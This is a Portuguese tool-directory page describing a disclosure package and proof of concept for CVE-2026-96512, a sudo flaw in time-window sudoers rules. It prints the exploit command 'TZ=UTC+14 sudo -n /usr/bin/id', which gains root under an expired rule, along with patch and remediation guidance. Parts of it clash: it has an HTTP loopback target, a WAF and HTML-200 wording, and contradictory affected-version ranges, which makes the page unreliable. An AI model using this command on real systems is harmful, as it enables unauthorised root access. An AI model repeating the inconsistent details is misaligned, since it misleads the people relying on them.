Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/abraxas/cve-2026-96512
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoVirtualização para SegurançaTestes de PenetraçãoLabs e Prática
GitHubabraxas/cve-2026-96512

CVE-2026-96512

Pacote de divulgação e PoC para CVE-2026-96512, um bypass de janela de tempo TZ NOTBEFORE/NOTAFTER do sudo que permite escalonamento local de privilégios, com reprodução em laboratório e orientação de patch.

Ver Repositório
12há 18h 1mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Abraxas Labs — CVE-2026-96512

abraxaslabs.tech  ·  github.com/abraxas  ·  @abraxas_null  ·  CVE-2026-96512

CVE-2026-96512

sudo 1.9.13p3 (Debian bookworm) — Sudo Project

Uma falha foi encontrada no sudo. Quando as regras do sudoers usam restrições de acesso baseadas em tempo NOTBEFORE ou NOTAFTER com timestamps que omitem o indicador de fuso horário Z final, a avaliação do tempo depende da variável de ambiente TZ herdada do usuário que a invoca.

CVECVE-2026-96512 · CVE.org
CWECWE-863
CVSSAlto: 7.8 CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Produtosudo
Afetadotodas as versões até 1.9.13p3 (Debian bookworm) (inclusive)
Corrigidocommit principal 1820a34 (ainda sem release upstream) e posteriores
Autenticaçãoautenticado (ver mapa do código-fonte)
LicençaGNU Affero GPL v3.0
Labapenas 127.0.0.1 · pacote de divulgação para fornecedor/cliente, não é um scanner

Aviso (do mapa do código-fonte)

plugins/sudoers parse_gentime / gram.y timespec. A correção sudo-project/sudo@1820a34 copia environ de envp e faz unsetenv TZ.


Entrada

  • Método: LOCAL
  • Caminho: TZ=UTC+14 sudo -n /usr/bin/id
  • Roteador: Política sudoers local autenticada. parse_gentime() mktime() em NOTAFTER sem Z. TZ herdada do sujeito do sudoers.
  • Notas: CVE-2026-96512 CWE-863 sudo 1.9.13p3. Testemunho: uid=0(root) com TZ=UTC+14; negado sem TZ. Não é um reverse shell. Apenas PR:L local.

Cadeia de chamadas

  • sudoers: labuser ALL=(root) NOPASSWD: NOTAFTER=<now-1h no Z> /usr/bin/id
  • labuser sudo -n /usr/bin/id -> negado (expirado)
  • TZ=UTC+14 sudo -n /usr/bin/id
  • parse_gentime mktime respeita POSIX TZ=UTC+14
  • NOTAFTER epoch desloca +14h; comando permitido como root

Pré-condições do lab

  • sudo 1.8.20 até 1.9.17p2
  • uma regra sudoers para o atacante com NOTBEFORE ou NOTAFTER e sem Z final

Testemunho

Sem TZ: sudo -n id negado. Com TZ=UTC+14: uid=0(root).

Não é sucesso

  • root sem TZ (regra ainda válida)
  • acesso remoto pela rede
  • reverse shell

Correção / remediação

Faça isto primeiro: Atualize o sudo para o commit principal 1820a34 (ainda sem release upstream) ou mais recente.

Verifique após a atualização

  • Execute novamente CVE-2026-96512-Abraxas-Labs.py contra a build corrigida: o testemunho mapeado não deve aparecer.
  • Confirme o aviso do fornecedor / changeset na árvore implantada (ver referências).
  • Uma assinatura de WAF é atraso, não uma correção.

Se não puder atualizar imediatamente

  • Desative ou isole o componente afetado.
  • Procure a condição de testemunho em produção (novos usuários privilegiados, arquivos inesperados, linhas injetadas — o que o mapa deste CVE nomear).

Reprodução (lab autorizado)

Alvo apenas http://127.0.0.1:8088 (ou o loopback que você vinculou). Não aponte este script para a internet.

root@kitploit:~
python3 CVE-2026-96512-Abraxas-Labs.py

Sucesso é o testemunho acima no corpo da resposta. Um HTML 200 genérico não é isso.


Imagens do lab

Stack de loopback usada para reproduzir. Imagens oficiais, a menos que um Dockerfile nesta pasta compile a partir do código-fonte.

  • lab/docker-compose.yml
  • lab/Dockerfile
root@kitploit:~
cd lab
docker compose up --force-recreate

Vincule a árvore do produto vulnerável ao lado do Compose se o YAML montar um diretório local (zip do plugin / tag de código-fonte da tabela de versões). Não publique nada exceto 127.0.0.1.


Referências

  • CVE-2026-96512 · NVD

  • CVE-2026-96512 · CVE.org

  • access.redhat.com/security/cve/cve-2026-96512

  • http://www.openwall.com/lists/oss-security/2026/09/24/4

  • github.com/sudo-project/sudo/commit/1820a349687522f51023d1ae5925125f59679a8c

  • www.cve.org/CVERecord?id=CVE-2026-96512

  • access.redhat.com/security/cve/CVE-2026-96512

  • Abraxas Labs: abraxaslabs.tech · github.com/abraxas · @abraxas_null


Registros (estruturado)

root@kitploit:~
# CVE-2026-96512

CWE: CWE-863
CVSS: High 7.8 CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (Red Hat).

## Description

sudoers `NOTBEFORE`/`NOTAFTER` timestamps without a trailing `Z` are converted with `mktime()`, which follows the caller’s `TZ`. A local user who is already named in such a rule can shift the window by up to ~25 hours (POSIX `TZ=UTC+14`) and run the allowed command outside the intended period. PAM authentication is unchanged.

## Product

sudo 1.9.13p3 on Debian bookworm (upstream 1.8.20–1.9.17p2). Fix in main `1820a34`; no upstream tarball yet at disclosure. Lab oracle is `uid=0(root)` via TZ, not a shell.

Licença

Este pacote de divulgação está licenciado sob a GNU Affero General Public License v3.0. Ver LICENSE.


Isenção de responsabilidade

Este pacote é para o fornecedor, o proprietário do site e labs licenciados. O script se comunica com 127.0.0.1. Usá-lo contra sistemas que você não possui não é autorizado pela Abraxas Labs. Sem garantias.

abraxaslabs.tech · github.com/abraxas · @abraxas_null

Baixar ferramenta